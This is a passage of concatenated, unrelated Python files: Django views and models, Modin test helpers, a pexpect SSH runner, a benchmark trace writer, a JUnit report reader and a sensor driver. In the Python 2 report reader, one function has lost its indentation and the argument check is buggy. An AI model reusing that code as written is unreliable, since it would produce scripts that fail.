        success = 'success' if success else 'fail'
        # update() returns a row count; the original bound it to an unused
        # local, which is dropped here.
        Trades.objects.filter(pk=pk).update(
            ticker=ticker,
            position=position,
            shares=shares,
            entry_date=entry_date,
            exit_date=exit_date,
            entry_price=entry_price,
            exit_price=exit_price,
            pnl=pnl,
            entry_comments=entry_comments,
            exit_comments=exit_comments,
            success=success
        )
    return HttpResponseRedirect(reverse("trades:index"))
def populate_update_form(request, pk):
    """Return the trade row(s) matching *pk* as JSON for the edit modal."""
    data = Trades.objects.filter(pk=pk)
    # list() of a values() queryset is JSON-serialisable; safe=False permits
    # a top-level list response.  (The unused `context` local was removed.)
    return JsonResponse(list(data.values()), safe=False)
def csv_write(request):
    """Stream the current user's trades as a downloadable CSV attachment."""
    response = HttpResponse(content_type='text/csv')
    response['Content-Disposition'] = 'attachment;filename=trades.csv'
    writer = csv.writer(response)
    writer.writerow(['Ticker', 'Position', 'Shares', 'Entry Date', 'Exit Date', 'Entry Price', 'Exit Price', 'PnL', 'Entry Comments', 'Exit Comments'])
    for t in Trades.objects.filter(user_id=request.user.id):
        writer.writerow([t.ticker, t.position, t.shares, t.entry_date,
                         t.exit_date, t.entry_price, t.exit_price, t.pnl,
                         t.entry_comments, t.exit_comments])
    return response
import os
from django.db import models
class Media(models.Model):
    """Uploaded media file with a display name and description."""
    media_name = models.CharField(max_length=100)
    media_url = models.FileField(upload_to='media/')
    media_description = models.CharField(max_length=150, default="Napisz tu coś")

    def extension(self):
        """Return the extension (with leading dot) of the stored file."""
        _, ext = os.path.splitext(self.media_url.name)
        return ext

    def delete(self, using=None, keep_parents=False):
        """Remove the underlying file from storage, then the DB row."""
        self.media_url.storage.delete(self.media_url.name)
        super().delete(using, keep_parents)

    def __str__(self):
        return self.media_name
|
# Licensed to Modin Development Team under one or more contributor license agreements.
# See the NOTICE file distributed with this work for additional information regarding
# copyright ownership. The Modin Development Team licenses this file to you under the
# Apache License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under
# the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific language
# governing permissions and limitations under the License.
import pytest
import modin.pandas as pd
from modin.utils import try_cast_to_pandas
import pandas
from pandas.api.types import is_datetime64_any_dtype
import pyarrow as pa
from modin.pandas.test.utils import (
df_equals,
io_ops_bad_exc,
eval_io as general_eval_io,
)
from modin.experimental.core.execution.native.implementations.omnisci_on_native.omnisci_worker import (
OmnisciServer,
)
def eval_io(
    fn_name,
    comparator=df_equals,
    cast_to_str=False,
    check_exception_type=True,
    raising_exceptions=io_ops_bad_exc,
    check_kwargs_callable=True,
    modin_warning=None,
    md_extra_kwargs=None,
    *args,
    **kwargs,
):
    """
    Evaluate I/O operation and do equality check after importing Modin's data to OmniSci.

    Notes
    -----
    For parameters description please refer to ``modin.pandas.test.utils.eval_io``.
    """
    def omnisci_comparator(df1, df2):
        """Evaluate equality comparison of the passed frames after importing the Modin's one to OmniSci."""
        # The context imports the Modin frame into OmniSci (and drops the
        # table again on exit) so the comparison covers the import path.
        with ForceOmnisciImport(df1, df2):
            # Aligning DateTime dtypes because of the bug related to the `parse_dates` parameter:
            # https://github.com/modin-project/modin/issues/3485
            df1, df2 = align_datetime_dtypes(df1, df2)
            comparator(df1, df2)
    # Delegate to the generic implementation with the OmniSci-aware
    # comparator substituted; everything else is forwarded untouched.
    general_eval_io(
        fn_name,
        comparator=omnisci_comparator,
        cast_to_str=cast_to_str,
        check_exception_type=check_exception_type,
        raising_exceptions=raising_exceptions,
        check_kwargs_callable=check_kwargs_callable,
        modin_warning=modin_warning,
        md_extra_kwargs=md_extra_kwargs,
        *args,
        **kwargs,
    )
def align_datetime_dtypes(*dfs):
    """
    Make all of the passed frames have DateTime dtype for the same columns.

    Cast column type of the certain frame to the DateTime type if any frame in
    the `dfs` sequence has DateTime type for this column.

    Parameters
    ----------
    *dfs : iterable of DataFrames
        DataFrames to align DateTime dtypes.

    Notes
    -----
    Passed Modin frames may be casted to pandas in the result.
    """
    datetime_cols = {}
    for frame in dfs:
        for col, dtype in frame.dtypes.items():
            # First DateTime dtype seen for a column wins.
            if col not in datetime_cols and is_datetime64_any_dtype(dtype):
                datetime_cols[col] = dtype
    if not datetime_cols:
        # Nothing to align.  Returning early also avoids casting empty
        # OmniSci frames to pandas:
        # https://github.com/modin-project/modin/issues/3428
        return dfs
    # OmniSci has difficulties with casting to certain dtypes (i.e. datetime64),
    # so cast to pandas before doing 'astype'.
    return tuple(try_cast_to_pandas(frame).astype(datetime_cols) for frame in dfs)
class ForceOmnisciImport:
    """
    Trigger import execution for Modin DataFrames obtained by OmniSci engine if already not.

    When using as a context class also cleans up imported tables at the end of the context.

    Parameters
    ----------
    *dfs : iterable
        DataFrames to trigger import.
    """
    def __init__(self, *dfs):
        # (df, frame_id) pairs for the tables this context imported itself.
        self._imported_frames = []
        for df in dfs:
            if not isinstance(df, (pd.DataFrame, pd.Series)):
                continue
            df.shape  # to trigger real execution
            if df.empty:
                continue
            partition = df._query_compiler._modin_frame._partitions[0][0]
            if partition.frame_id is not None:
                # Already imported into OmniSci; nothing to do for this frame.
                continue
            frame = partition.get()
            # Import via the path matching the partition's storage format.
            if isinstance(frame, (pandas.DataFrame, pandas.Series)):
                frame_id = OmnisciServer().put_pandas_to_omnisci(frame)
            elif isinstance(frame, pa.Table):
                frame_id = OmnisciServer().put_arrow_to_omnisci(frame)
            else:
                raise TypeError(
                    f"Unexpected storage format, expected pandas.DataFrame or pyarrow.Table, got: {type(frame)}."
                )
            partition.frame_id = frame_id
            self._imported_frames.append((df, frame_id))
    def __enter__(self):
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        # Drop every table this context imported; reset frame_id only when
        # the partition still points at the table we created.
        for df, frame_id in self._imported_frames:
            actual_frame_id = df._query_compiler._modin_frame._partitions[0][0].frame_id
            OmnisciServer().executeDDL(f"DROP TABLE IF EXISTS {frame_id}")
            if actual_frame_id == frame_id:
                df._query_compiler._modin_frame._partitions[0][0].frame_id = None
        self._imported_frames = []
def set_execution_mode(frame, mode, recursive=False):
    """
    Enable execution mode assertions for the passed frame.

    With a mode set, the frame raises an AssertionError whenever the
    execution flow leaves the scope of that mode.

    Parameters
    ----------
    frame : DataFrame or Series
        Modin frame to set execution mode at.
    mode : {None, "lazy", "arrow"}
        "lazy" permits only delayed computations, "arrow" only computations
        via Pyarrow, and None lifts the restriction entirely.
    recursive : bool, default: False
        Also apply the mode to every frame in the delayed computation tree.
    """
    target = frame
    if isinstance(target, (pd.Series, pd.DataFrame)):
        # Unwrap the high-level API object down to the core Modin frame.
        target = target._query_compiler._modin_frame
    target._force_execution_mode = mode
    if recursive and hasattr(target._op, "input"):
        for child in target._op.input:
            set_execution_mode(child, mode, True)
def run_and_compare(
    fn,
    data,
    data2=None,
    force_lazy=True,
    force_arrow_execute=False,
    allow_subqueries=False,
    comparator=df_equals,
    **kwargs,
):
    """Verify equality of the results of the passed function executed against pandas and modin frame."""
    def run_modin(
        fn,
        data,
        data2,
        force_lazy,
        force_arrow_execute,
        allow_subqueries,
        constructor_kwargs,
        **kwargs,
    ):
        # Build the Modin frames under the same names the pandas path uses;
        # 'df' is an alias for 'df1'.
        kwargs["df1"] = pd.DataFrame(data, **constructor_kwargs)
        kwargs["df2"] = pd.DataFrame(data2, **constructor_kwargs)
        kwargs["df"] = kwargs["df1"]
        if force_lazy:
            set_execution_mode(kwargs["df1"], "lazy")
            set_execution_mode(kwargs["df2"], "lazy")
        elif force_arrow_execute:
            set_execution_mode(kwargs["df1"], "arrow")
            set_execution_mode(kwargs["df2"], "arrow")
        exp_res = fn(lib=pd, **kwargs)
        # Constrain the *result* tree too, optionally allowing subqueries.
        if force_arrow_execute:
            set_execution_mode(exp_res, "arrow", allow_subqueries)
        elif force_lazy:
            set_execution_mode(exp_res, None, allow_subqueries)
        return exp_res
    constructor_kwargs = kwargs.pop("constructor_kwargs", {})
    try:
        kwargs["df1"] = pandas.DataFrame(data, **constructor_kwargs)
        kwargs["df2"] = pandas.DataFrame(data2, **constructor_kwargs)
        kwargs["df"] = kwargs["df1"]
        ref_res = fn(lib=pandas, **kwargs)
    except Exception as e:
        # pandas raised: Modin is expected to raise the same exception type.
        with pytest.raises(type(e)):
            exp_res = run_modin(
                fn=fn,
                data=data,
                data2=data2,
                force_lazy=force_lazy,
                force_arrow_execute=force_arrow_execute,
                allow_subqueries=allow_subqueries,
                constructor_kwargs=constructor_kwargs,
                **kwargs,
            )
            # Touching .index forces execution of the lazy Modin result so
            # the expected exception actually fires inside pytest.raises.
            _ = exp_res.index
    else:
        exp_res = run_modin(
            fn=fn,
            data=data,
            data2=data2,
            force_lazy=force_lazy,
            force_arrow_execute=force_arrow_execute,
            allow_subqueries=allow_subqueries,
            constructor_kwargs=constructor_kwargs,
            **kwargs,
        )
        comparator(ref_res, exp_res)
|
from django import forms
from .models import ProductoImagen
class ProductoImagenForm(forms.ModelForm):
    """ModelForm for creating and editing ProductoImagen records."""
    class Meta:
        # Only these model fields are exposed in the form.
        model = ProductoImagen
        fields = ['producto', 'nombre','descripcion', 'imagen']
|
def on_init(t):
    """GridLAB-D hook called once at initialisation; True signals success."""
    # No initialisation work is required yet.
    return True
def on_commit(t):
    # GLOBAL ON COMMIT ie every solution
    # http://docs.gridlabd.us/_page.html?owner=slacgismo&project=gridlabd&branch=develop&folder=/Module&doc=/Module/Python.md
    # NOTE(review): `gridlabd` is not imported in this file — presumably the
    # module is injected by the GridLAB-D runtime when loading this script;
    # confirm before running standalone.
    print("Time: ", t)
    power_val_A = gridlabd.get_value("load_1","constant_power_A")
    # After this timestamp, force phase B of load_1 to a constant 30.
    if t>1608973200 :
        gridlabd.set_value("load_1","constant_power_B", "30")
    print("Power drawn on phase A load 1", power_val_A)
    power_val_B = gridlabd.get_value("load_1","constant_power_B")
    print("Power drawn on phase B load 1", power_val_B)
    # Returning True tells the solver this commit succeeded.
    return True
|
from selenium import webdriver
from Utils.folder_structure_builder import FolderStructureBuilder
class Helpers:
    @classmethod
    def take_screenshot(cls, browser, filename):
        """Save a screenshot of *browser* into the failed-screenshots folder.

        The file is named after *filename*.  (Previously the parameter was
        ignored and a literal placeholder was written into the path.)
        """
        location = f'{FolderStructureBuilder.failed_screenshot_folder}/{filename}.png'
        browser.get_screenshot_as_file(location)
|
#!/usr/bin/env python3
import sys, re, os
sys.path.append("../../../utils/")
from segmaker import segmaker
# Bit/tag correlation engine seeded with the bitstream under analysis.
segmk = segmaker("design.bits")
# Can fit 4 per CLB
# BELable
multi_bels_by = [
    'SRL16E',
    'SRLC32E',
]
# Not BELable
multi_bels_bn = [
    'RAM32X1S',
    'RAM64X1S',
]
# Those requiring special resources
# Just make one per module
greedy_modules = [
    'my_RAM128X1D',
    'my_RAM128X1S',
    'my_RAM256X1S',
]
# NOTE(review): these three lists are not referenced elsewhere in this
# script — presumably consumed by a companion generator; confirm.
print("Loading tags")
'''
Expected params.csv layout (header then one row per solved site):
module,loc,bela,belb,belc,beld
my_ram_N,SLICE_X12Y100,SRLC32E,SRL16E,SRLC32E,LUT6
my_ram_N,SLICE_X12Y101,SRLC32E,SRLC32E,SRLC32E,SRLC32E
my_RAM256X1S,SLICE_X12Y102,None,0,,
'''
f = open('params.csv', 'r')
f.readline()
for l in f:
    l = l.strip()
    module, loc, p0, p1, p2, p3 = l.split(',')
    # WA7 is used by 128/256-deep primitives; WA8 only by RAM256X1S.
    segmk.addtag(
        loc, "WA7USED",
        module in ('my_RAM128X1D', 'my_RAM128X1S', 'my_RAM256X1S'))
    segmk.addtag(loc, "WA8USED", module == 'my_RAM256X1S')
    # Per-BEL flags, ordered (a, b, c, d)
    # Size set for RAM32X1S, RAM32X1D, and SRL16E
    size = [0, 0, 0, 0]
    # SRL set for SRL* primitives
    srl = [0, 0, 0, 0]
    # RAM set for RAM* primitives
    ram = [0, 0, 0, 0]
    if module == 'my_ram_N':
        # Each one of: SRL16E, SRLC32E, LUT6
        bels = [p0, p1, p2, p3]
        # Clock Enable (CE) clock gate only enabled if we have clocked elements
        # A pure LUT6 does not, but everything else should
        segmk.addtag(loc, "WEMUX.CE", bels != ['LUT6', 'LUT6', 'LUT6', 'LUT6'])
        beli = 0
        for which, bel in zip('ABCD', bels):
            if bel == 'SRL16E':
                size[beli] = 1
            if bel in ('SRL16E', 'SRLC32E'):
                srl[beli] = 1
            beli += 1
    else:
        n = p0
        if n:
            n = int(n)
        # Unused. Just to un-alias mux
        #_ff = int(p1)
        # Can pack 4 into a CLB
        # D is always occupied first (due to WA/A sharing on D)
        # TODO: maybe investigate ROM primitive for completeness
        pack4 = [
            # (a, b, c, d)
            (0, 0, 0, 1),
            (1, 0, 0, 1),
            (1, 1, 0, 1),
            (1, 1, 1, 1),
        ]
        # Uses CD first
        pack2 = [
            (0, 0, 1, 1),
            (1, 1, 1, 1),
        ]
        # Always use all 4 sites
        if module in ('my_RAM32M', 'my_RAM64M', 'my_RAM128X1D',
                      'my_RAM256X1S'):
            ram = [1, 1, 1, 1]
        # Only can occupy CD I guess
        elif module == 'my_RAM32X1D':
            ram = [0, 0, 1, 1]
        # Uses 2 sites at a time
        elif module in ('my_RAM64X1D_N', 'my_RAM128X1S_N'):
            ram = pack2[n - 1]
        # Uses 1 site at a time
        elif module in ('my_RAM32X1S_N', 'my_RAM64X1S_N'):
            ram = pack4[n - 1]
        else:
            assert (0)
        # All entries here require D
        assert (ram[3])
        if module == 'my_RAM32X1D':
            # Occupies CD
            size[2] = 1
            size[3] = 1
        elif module == 'my_RAM32M':
            size = [1, 1, 1, 1]
        elif module == 'my_RAM32X1S_N':
            size = pack4[n - 1]
        else:
            assert (not module.startswith('my_RAM32'))
    # Now commit bits after marking 1's
    for beli, bel in enumerate('ABCD'):
        segmk.addtag(loc, "%sLUT.RAM" % bel, ram[beli])
        segmk.addtag(loc, "%sLUT.SRL" % bel, srl[beli])
        # Fixed: the original line read `module == segmk.addtag(...)` — a
        # stray comparison typo whose result was discarded (the tag itself
        # was still added).
        segmk.addtag(loc, "%sLUT.SMALL" % bel, size[beli])
def bitfilter(frame_idx, bit_idx):
    """Exclude known-aliased CE PIP bits from the solve."""
    # Hack to remove aliased PIP bits on CE.
    # We should either mix up routing more or exclude previous DB entries.
    assert os.getenv("XRAY_DATABASE") == "artix7"
    aliased = {(0, 27), (1, 25), (1, 26), (1, 29)}
    return (frame_idx, bit_idx) not in aliased
# Solve for bit meanings from the collected tags, then emit the database.
segmk.compile(bitfilter=bitfilter)
segmk.write()
|
# Number guessing game: pick a random 1-100 integer and check one guess.
import random

# Choose the secret answer in [1, 100].
answer = random.randint(1, 100)
# NOTE(review): this prints the answer before asking — presumably a
# debugging aid; remove for real play.
print(answer)

# Ask the player for a name and a guess.
username = input("What is your name? ")
# int() replaces eval(): eval executes arbitrary code typed by the user.
guess = int(input("Hi, " + username + " guess the number: "))

# Report the result.
if guess == answer:
    print("Correct! Answer was " + str(answer))
else:
    print("You are wrong!!")
|
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
# ---HOMEWORK 3----
# (the heading above was a bare expression in the notebook export,
#  which raised a SyntaxError at import time; it is now a comment)
#Name: Ayşegül
#Surname: Hülagü
#mail: hulaguaysegul@gmail.com
# In[123]:
def prime_numbers(lower, upper):
    """Print every prime in the inclusive range [lower, upper].

    Trial division: the inner loop's `else` only fires when no divisor was
    found.  Values below 2 are skipped — the original printed 0 and 1
    (their divisor range is empty), though neither is prime.
    """
    for candidate in range(lower, upper + 1):
        if candidate < 2:
            continue
        for divisor in range(2, candidate):
            if candidate % divisor == 0:
                break
        else:
            print(candidate)
# In[124]:
# Demo run: print every prime up to 100.
prime_numbers(2,100)
|
import os
import pytest
import ucp.exceptions
from ucp._libs import ucx_api
from ucp._libs.arr import Array
def test_get_config():
    """A fresh context exposes its configuration as a dict."""
    config = ucx_api.UCXContext().get_config()
    assert isinstance(config, dict)
    assert config["MEMTYPE_CACHE"] == "n"
def test_set_env():
    """UCX picks up configuration exported via environment variables."""
    os.environ["UCX_SEG_SIZE"] = "2M"
    config = ucx_api.UCXContext().get_config()
    assert config["SEG_SIZE"] == os.environ["UCX_SEG_SIZE"]
def test_init_options():
    """Explicit constructor options take precedence over the environment."""
    os.environ["UCX_SEG_SIZE"] = "2M"  # Should be ignored
    options = {"SEG_SIZE": "3M"}
    config = ucx_api.UCXContext(options).get_config()
    assert config["SEG_SIZE"] == options["SEG_SIZE"]
def test_init_unknown_option():
    """Unknown option names are rejected with UCXConfigError."""
    with pytest.raises(ucp.exceptions.UCXConfigError):
        ucx_api.UCXContext({"UNKNOWN_OPTION": "3M"})
def test_init_invalid_option():
    """Badly-formatted option values are rejected with UCXConfigError."""
    with pytest.raises(ucp.exceptions.UCXConfigError):
        ucx_api.UCXContext({"SEG_SIZE": "invalid-size"})
@pytest.mark.parametrize("feature_flag", [ucx_api.Feature.TAG, ucx_api.Feature.STREAM])
def test_feature_flags_mismatch(feature_flag):
    """Using an API from the feature NOT enabled on the context must raise."""
    ctx = ucx_api.UCXContext(feature_flags=(feature_flag,))
    worker = ucx_api.UCXWorker(ctx)
    addr = worker.get_address()
    # Loopback endpoint to the worker itself is enough to exercise the check.
    ep = worker.ep_create_from_worker_address(addr, endpoint_error_handling=False)
    msg = Array(bytearray(10))
    if feature_flag == ucx_api.Feature.STREAM:
        # Context created with STREAM only: TAG operations must be rejected.
        with pytest.raises(
            ValueError, match="UCXContext must be created with `Feature.TAG`"
        ):
            ucx_api.tag_send_nb(ep, msg, msg.nbytes, 0, None)
        with pytest.raises(
            ValueError, match="UCXContext must be created with `Feature.TAG`"
        ):
            ucx_api.tag_recv_nb(worker, msg, msg.nbytes, 0, None)
    elif feature_flag == ucx_api.Feature.TAG:
        # Context created with TAG only: STREAM operations must be rejected.
        with pytest.raises(
            ValueError, match="UCXContext must be created with `Feature.STREAM`"
        ):
            ucx_api.stream_send_nb(ep, msg, msg.nbytes, None)
        with pytest.raises(
            ValueError, match="UCXContext must be created with `Feature.STREAM`"
        ):
            ucx_api.stream_recv_nb(ep, msg, msg.nbytes, None)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# remote_ssh.py
import pexpect
def remote_ssh(ip, password, cmd, username='root'):
    """Run *cmd* on *ip* over ssh, answering password/host-key prompts.

    Returns ``(exitcode, output)``.  pexpect only populates ``exitstatus``
    when the child is closed, so the remaining output is read first, the
    child is closed, and only then is the exit code taken (the original
    read it before close() and therefore always got None).
    """
    ssh = pexpect.spawn('ssh ' + username + '@' + ip + ' ' + cmd, timeout=None)
    try:
        i = ssh.expect(['password:', 'yes/no'], timeout=5)
        if i == 0:
            ssh.sendline(password)
        elif i == 1:
            # First connection: accept the host key, then send the password.
            ssh.sendline('yes')
            ssh.expect('password:', timeout=5)
            ssh.sendline(password)
    except pexpect.EOF:
        print("EOF")
    except pexpect.TIMEOUT:
        print("TIMEOUT")
    r = ssh.read().decode()
    ssh.close()
    exitcode = ssh.exitstatus
    return exitcode, r
|
import csv
import textwrap
from datetime import datetime
from typing import Optional
import pyomo.environ as pyo
import yaml
from pysperf import _JobResult
from pysperf.config import outputdir, time_format
from pysperf.model_library import models
from pysperf.solver_library import solvers
from pysperf.paver_utils.julian import get_julian_datetime
from pysperf.paver_utils.parse_to_gams import solver_status_to_gams, termination_condition_to_gams_format
from pysperf.run_manager import _load_run_config, get_run_dir, this_run_config
def create_solu_file() -> None:
    """
    Creates the pysperf_models.solu file based on optimal and best-solution-known information for each model.
    """
    solu_path = outputdir.joinpath("pysperf_models.solu")
    with solu_path.open('w') as solufile:
        for test_model in models.values():
            # A known optimum wins; otherwise fall back to the best known value.
            has_opt = test_model.opt_value is not None
            marker = "=opt=" if has_opt else "=best="
            value = test_model.opt_value if has_opt else test_model.best_value
            print(f"{marker}\t{test_model.name}\t{value}", file=solufile)
def create_paver_tracefile(run_number: Optional[int] = None) -> None:
    """Build a GAMS/Paver trace file (``results.trc``) from the per-job
    result logs of a pysperf run.

    Args:
        run_number: selects the run directory; ``None`` means the default
            (most recent) run as resolved by ``get_run_dir``.
    """
    this_run_dir = get_run_dir(run_number)
    _load_run_config(this_run_dir)
    # Create trace file
    trace_header = """\
* Trace Record Definition
* GamsSolve
* InputFileName,SolverName,OptionFile,Direction,NumberOfEquations,NumberOfVariables,NumberOfDiscreteVariables,NumberOfNonZeros,NumberOfNonlinearNonZeros,
* ModelStatus,SolverStatus,ObjectiveValue,ObjectiveValueEstimate,SolverTime,ETSolver,NumberOfIterations,NumberOfNodes
"""
    trace_data = []
    # Only jobs that ran and did not fail contribute trace records
    # (set difference of the two job collections).
    for model_name, solver_name in this_run_config.jobs_run - this_run_config.jobs_failed:
        with this_run_dir.joinpath(solver_name, model_name, "pysperf_result.log").open('r') as resultfile:
            job_result = _JobResult(**yaml.safe_load(resultfile))
        _validate_job_result(job_result)
        test_model = models[model_name]
        test_solver = solvers[solver_name]
        # Field order must match the GAMS trace record definition above.
        trace_line = [
            model_name,  # Model Name
            'MINLP',  # LP, MIP, NLP, etc.
            solver_name,  # ...
            test_solver.nlp,  # default NLP solver
            test_solver.milp,  # default MIP solver
            get_julian_datetime(datetime.strptime(
                job_result.model_build_start_time, time_format)),  # start day/time of job
            0 if test_model.objective_sense == "minimize" else 1,  # direction 0=min, 1=max
            test_model.constraints,  # total number of equations
            test_model.variables,  # total number of variables
            test_model.binary_variables + test_model.integer_variables,  # total number of discrete variables
            'nznum?',  # number of nonzeros  # NOTE(review): placeholder, not a real count
            'nlz?',  # number of nonlinear nonzeros  # NOTE(review): placeholder
            0,  # 1= optfile included
            termination_condition_to_gams_format(job_result.termination_condition),
            # GAMS model return status - see the GAMS return codes section.
            solver_status_to_gams(pyo.SolverStatus.ok),  # GAMS solver return status - see the GAMS return codes section.
            job_result.UB,  # value of objective function
            job_result.UB,  # objective function estimate # TODO I think this only works for minimize?
            job_result.solver_run_time,  # resource time used (sec)
            job_result.iterations,  # number of solver iterations
            0,  # dom used
            0,  # nodes used
            '# automatically generated by pysperf'
        ]
        trace_data.append(trace_line)
    with outputdir.joinpath("results.trc").open('w') as tracefile:
        tracefile.write(textwrap.dedent(trace_header))
        tracefile.write('*\n')
        csvwriter = csv.writer(tracefile)
        csvwriter.writerows(trace_data)
def _validate_job_result(job_result: _JobResult) -> None:
    """Normalize ``job_result.termination_condition`` in place.

    ``None`` becomes ``TerminationCondition.unknown``; a plain string (as
    deserialized from YAML) is coerced to the Pyomo enum.
    """
    if job_result.termination_condition is None:
        job_result.termination_condition = pyo.TerminationCondition.unknown
    # isinstance instead of `type(...) == str`: idiomatic and also accepts
    # str subclasses.
    elif isinstance(job_result.termination_condition, str):
        job_result.termination_condition = pyo.TerminationCondition(
            job_result.termination_condition)
|
# Demo: named-entity visualization with spaCy's displacy renderer.
import spacy
nlp = spacy.load('en_core_web_sm')
from spacy import displacy
# NOTE(review): the two adjacent string literals are concatenated with no
# separating space, producing "million.By" in the text — confirm intended.
doc = nlp("Over the last quarter, Apple sold nearly twenty thousand iPods for a profit of $6 million." "By contrast, Sony only sold 8000 Walkman music players.")
#doc = displacy.render(doc, style = 'ent', jupyter = True)
# Render entities sentence by sentence (Jupyter inline output).
for sentence in doc.sents:
    displacy.render(sentence, jupyter = True, style = 'ent')
# Restrict the display to PRODUCT and ORG entities only.
options = {'ents': ['PRODUCT', 'ORG']}
displacy.render(doc, style = 'ent', jupyter = True, options = options, )
# Custom solid colors per entity label.
colors = {'ORG': 'red', 'PRODUCT': 'blue'}
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
# CSS gradients are also accepted as color values.
colors = {'ORG': 'radial-gradient(yellow, green)' }
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
colors = {'ORG': 'linear-gradient(green, yellow)' }
options = {'ents': ['PRODUCT', 'ORG'], 'colors': colors}
displacy.render(doc, style = 'ent', jupyter = True, options = options)
# serve() starts a blocking local web server to display the visualization.
displacy.serve(doc, style = 'ent', options = options)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import glob
import traceback
from xml.etree.ElementTree import ElementTree
def print_detail_information(file_path, failure_cases):
    # Print the class/test names of each failing testcase, then dump the
    # companion "-output.txt" file (derived from the report filename) if
    # it exists. Python 2 print statements; output goes to stdout.
    print "-" * 50
    for testcase in failure_cases:
        print "classname: %s / testname: %s" % (testcase.get("classname"), testcase.get("name"))
    print "-" * 50
    print "Printing output..."
    # Convention: TEST-foo.xml pairs with foo-output.txt in the same dir.
    output_file_path = file_path.replace("TEST-", "").replace(".xml", "-output.txt")
    if os.path.exists(output_file_path):
        with open(output_file_path, "r") as fr:
            print fr.read()
    else:
        print "No output file for the test case. desired output file path: %s" % output_file_path
    print "-" * 50
def print_error_reports_from_report_file(file_path):
tree = ElementTree()
try:
tree.parse(file_path)
except:
print "-" * 50
print "Error parsing %s" % file_path
with open(file_path, "r") as fr:
print fr.read()
print "-" * 50
return
testcases = tree.findall(".//testcase")
failure_cases = []
for testcase in testcases:
error = testcase.find("error")
fail = testcase.find("fail")
failure = testcase.find("failure")
if error is not None or fail is not None or failure is not None:
failure_cases.append(testcase)
if len(failure_cases) > 0:
print_detail_information(file_path, failure_cases)
def main(report_dir_path):
    # Walk all TEST-*.xml reports under report_dir_path and print failure
    # details for each; errors on one report do not stop the scan.
    for test_report in glob.iglob(report_dir_path + '/TEST-*.xml'):
        file_path = os.path.abspath(test_report)
        try:
            print "Checking %s" % test_report
            print_error_reports_from_report_file(file_path)
        except Exception, e:
            # Log and keep going — one bad report must not abort the run.
            print "Error while reading report file, %s" % file_path
            print "Exception: %s" % e
            traceback.print_exc()
if __name__ == "__main__":
if sys.argv < 2:
print "Usage: %s [report dir path]" % sys.argv[0]
sys.exit(1)
main(sys.argv[1])
|
def repeatedStringMatch(A, B):
    """Return the minimum number of times A must be repeated so that B is
    a substring of the repetition, or -1 when no repetition works.

    :type A: str
    :type B: str
    :rtype: int
    """
    reps = 1
    stacked = A
    # Repeat A until the stack is at least as long as B.
    while len(stacked) < len(B):
        stacked += A
        reps += 1
    # One extra repetition may be needed when B straddles a boundary.
    if len(stacked) >= len(B) and B not in stacked:
        stacked += A
        reps += 1
    return reps if B in stacked else -1


print(repeatedStringMatch("a", "aa"))
|
from umachine import SPI, Pin
from utime import sleep_ms
class MPL115A1:
    """Read pressure and temperature from MPL115A1 SPI sensor.
    Adapted from https://github.com/FaBoPlatform/FaBoBarometer-MPL115-Python
    Sources:
    http://www.nxp.com/assets/documents/data/en/data-sheets/MPL115A1.pdf
    https://learn.adafruit.com/micropython-hardware-spi-devices/spi-master.
    As shown in section 3.6 of the datasheet, each 1-byte command is followed
    by reading a 1-byte value (during which the master sends a dummy 0x00).
    After a sequence of commands and reads, an extra 0x00 byte is sent.
    The whole sequence is contained between CS enable and CS disable.
    Constants have been defined for the sequence of commands and dummy
    bytes to read coefficients (CMD_COEFS), start measurement (CMD_START)
    and read pressure and temperature data (CMD_DATA).
    """
    # Command/dummy byte sequences (see class docstring and datasheet 3.6).
    CMD_COEFS = bytearray(b'\x88\x00\x8A\x00\x8C\x00\x8E\x00\x90\x00\x92\x00\x94\x00\x96\x00\x00')
    CMD_START = bytearray(b'\x24\x00')
    CMD_DATA = bytearray(b'\x80\x00\x82\x00\x84\x00\x86\x00\x00')

    def __init__(self, sclk='', miso='', mosi='', cs='P12',
                 baudrate=1000000, mode=0, altitude=0.0):
        # NOTE(review): sclk/miso/mosi/baudrate/mode are accepted but never
        # used — the SPI bus below is created with a hard-coded baudrate of
        # 2000000 and the default pins. Confirm whether they should be wired
        # through to the SPI constructor.
        self.cs = Pin(cs, mode=Pin.OUT)
        self._spi_enable(False)
        self.spi = SPI(0, mode=SPI.MASTER, baudrate=2000000, polarity=0, phase=0) # this uses the SPI default pins for CLK, MOSI and MISO (``P10``, ``P11`` and ``P14``)
        self._get_coefficients()
        self.P = 0 # measured pressure at observer's altitude
        self.P0 = 0 # calculated pressure at mean sea level
        self.T = 0 # measured temperature
        self.altitude = altitude

    def _spi_enable(self, b=True):
        # Chip-select is active-low: enabling the device pulls CS low.
        self.cs.value(False) if b else self.cs.value(True)

    def _spi_disable(self):
        # NOTE(review): calls _spi_enable(False), which *disables* (CS high)
        # — behavior is correct, the delegation just reads oddly.
        self._spi_enable(False)

    def _convert_data(self, lsb, msb):
        # Combine two bytes into a signed 16-bit (two's complement) value.
        value = lsb | (msb << 8)
        if (value & (1 << 16 - 1)):
            value -= (1 << 16)
        return value

    def _get_coefficients(self):
        """Read the factory calibration coefficients a0, b1, b2, c12 and
        scale them by the fixed-point factors from the datasheet."""
        data = bytearray(len(self.CMD_COEFS))
        self._spi_enable(True)
        self.spi.write_readinto(self.CMD_COEFS, data)
        self._spi_enable(False)
        # Response bytes interleave with the command bytes: odd indices hold
        # the values read back (MSB first, then LSB, per coefficient).
        self.a0 = self._convert_data(data[3], data[1])
        self.b1 = self._convert_data(data[7], data[5])
        self.b2 = self._convert_data(data[11], data[9])
        self.c12 = self._convert_data(data[15], data[13])
